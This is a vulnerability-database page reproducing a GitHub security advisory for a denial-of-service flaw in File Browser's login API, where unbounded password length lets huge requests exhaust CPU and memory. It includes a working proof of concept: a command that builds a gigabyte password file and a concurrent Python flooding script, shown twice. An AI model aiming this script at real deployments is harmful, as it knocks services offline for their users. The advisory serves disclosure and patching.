GHSA-W5FM-68J4-FPC4

Vulnerability from github – Published: 2026-06-12 21:51 – Updated: 2026-06-12 21:51
VLAI
Summary
File Browser has a DoS Vulnerability via Public Login API
Details

Summary

Unchecked passwords maximums allow for an arbitrarily large password to be passed into the login API. This spikes CPU and memory, and after testing, crashes, heavily lags any container created, and has even made my docker daemon start to send errors with status code 500 even after the container was destroyed.

Details

When sending JSON in the body of the request to the route api/login, if a large password is sent, there is no checking on a maximum length password. This means that any length string can be sent to the server and it will be hashed. Specifically the function CheckPwd in users/password.go is called to hash and check to see if the user supplied password is valid, but there is no maximum length for the password checked in that function. Depending on how many concurrent requests are being made, there may be no logs about the failed login attempts.

PoC

Create a file with a large password using this command:

yes "thisisalongphraseithinksoyeahitisactuallyimsureitiswhatisthisisamouthwoahimcoolwheredidthiscomefromwowza" | head -n 10000000 > large-password.txt

This makes a file that's about a gigabyte. The n parameter in the head function can be adjusted to increase or decrease the file size. Afterwards, run the following script to make a filebrowser container:

docker run -v filebrowser_data:/srv -v filebrowser_database:/database -v filebrowser_config:/config -p 8080:80 filebrowser/filebrowser

After running the container, it is recommended to bring up some sort of performance dashboard on the container that is running to monitor CPU and memory usage. Afterwards, run the following Python script (make sure to install dependencies: pip install aiohttp asyncio). The CONCURRENT_REQUESTS parameter controls the number of requests to be making at one time. The TOTAL_REQUESTS parameter controls the grand total number of requests sent to the targeted container. If one wants more severe results, turn it up. If one wants less severe results, turn it down. The setting it's on right now is where I've found it can either crash the targeted container or just make it lag until it doesn't respond but is still on.

import aiohttp
import asyncio
from time import perf_counter

url = 'http://localhost:8080/api/login'
CONCURRENT_REQUESTS = 30
TOTAL_REQUESTS = 1000
async def make_request(session, body, semaphore):
    async with semaphore:
        try:
            async with session.post(url, json=body) as response:
                print(response.status)
        except asyncio.TimeoutError:
            print('Request timed out')
        except aiohttp.ConnectionTimeoutError:
            print('Request timed out')
        except Exception as e:
            print(f"Unexpected error {e}")

async def main():
    with open("./large-password.txt", "r") as f:
        file_contents = f.read()

    body = {
        "username": "admin",
        "password": file_contents,
        "recaptcha": ""
    }

    headers = {"Content-Type": "application/json"}
    semaphore = asyncio.Semaphore(CONCURRENT_REQUESTS)

    async with aiohttp.ClientSession(headers=headers) as session:
        tasks = [
            make_request(session, body, semaphore)
            for _ in range(TOTAL_REQUESTS)  
        ]

        start = perf_counter()
        await asyncio.gather(*tasks)
        end = perf_counter()

        print(f"Completed {len(tasks)} requests in {end - start:.2f} seconds")

if __name__ == "__main__":
    asyncio.run(main())

Impact

The vulnerability impacts anyone who uses this service.

Severity
6.5 (Medium)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
8.7 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.63.5"
      },
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser/v2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.63.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/filebrowser/filebrowser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "1.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-54092"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1284",
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-12T21:51:24Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nUnchecked passwords maximums allow for an arbitrarily large password to be passed into the login API. This spikes CPU and memory, and after testing, crashes, heavily lags any container created, and has even made my docker daemon start to send errors with status code 500 even after the container was destroyed.\n\n### Details\nWhen sending JSON in the body of the request to the route `api/login`, if a large password is sent, there is no checking on a maximum length password. This means that any length string can be sent to the server and it will be hashed. Specifically the function `CheckPwd` in `users/password.go` is called to hash and check to see if the user supplied password is valid, but there is no maximum length for the password checked in that function. Depending on how many concurrent requests are being made, there may be no logs about the failed login attempts.\n\n### PoC\nCreate a file with a large password using this command:\n```bash\nyes \"thisisalongphraseithinksoyeahitisactuallyimsureitiswhatisthisisamouthwoahimcoolwheredidthiscomefromwowza\" | head -n 10000000 \u003e large-password.txt\n```\nThis makes a file that\u0027s about a gigabyte. The `n` parameter in the head function can be adjusted to increase or decrease the file size. Afterwards, run the following script to make a filebrowser container:\n```bash\ndocker run -v filebrowser_data:/srv -v filebrowser_database:/database -v filebrowser_config:/config -p 8080:80 filebrowser/filebrowser\n```\n\nAfter running the container, it is recommended to bring up some sort of performance dashboard on the container that is running to monitor CPU and memory usage. Afterwards, run the following Python script (make sure to install dependencies: `pip install aiohttp asyncio `). The `CONCURRENT_REQUESTS` parameter controls the number of requests to be making at one time. The `TOTAL_REQUESTS` parameter controls the grand total number of requests sent to the targeted container. If one wants more severe results, turn it up. If one wants less severe results, turn it down. The setting it\u0027s on right now is where I\u0027ve found it can either crash the targeted container or just make it lag until it doesn\u0027t respond but is still on.\n\n```python\nimport aiohttp\nimport asyncio\nfrom time import perf_counter\n\nurl = \u0027http://localhost:8080/api/login\u0027\nCONCURRENT_REQUESTS = 30\nTOTAL_REQUESTS = 1000\nasync def make_request(session, body, semaphore):\n    async with semaphore:\n        try:\n            async with session.post(url, json=body) as response:\n                print(response.status)\n        except asyncio.TimeoutError:\n            print(\u0027Request timed out\u0027)\n        except aiohttp.ConnectionTimeoutError:\n            print(\u0027Request timed out\u0027)\n        except Exception as e:\n            print(f\"Unexpected error {e}\")\n\nasync def main():\n    with open(\"./large-password.txt\", \"r\") as f:\n        file_contents = f.read()\n\n    body = {\n        \"username\": \"admin\",\n        \"password\": file_contents,\n        \"recaptcha\": \"\"\n    }\n\n    headers = {\"Content-Type\": \"application/json\"}\n    semaphore = asyncio.Semaphore(CONCURRENT_REQUESTS)\n\n    async with aiohttp.ClientSession(headers=headers) as session:\n        tasks = [\n            make_request(session, body, semaphore)\n            for _ in range(TOTAL_REQUESTS)  \n        ]\n\n        start = perf_counter()\n        await asyncio.gather(*tasks)\n        end = perf_counter()\n\n        print(f\"Completed {len(tasks)} requests in {end - start:.2f} seconds\")\n\nif __name__ == \"__main__\":\n    asyncio.run(main())\n```\n\n### Impact\nThe vulnerability impacts anyone who uses this service.",
  "id": "GHSA-w5fm-68j4-fpc4",
  "modified": "2026-06-12T21:51:24Z",
  "published": "2026-06-12T21:51:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-w5fm-68j4-fpc4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/commit/847d08bdd135e5c3659f2e6dea2f0cd36617af9b"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/filebrowser/filebrowser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.63.6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "File Browser has a DoS Vulnerability via Public Login API"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.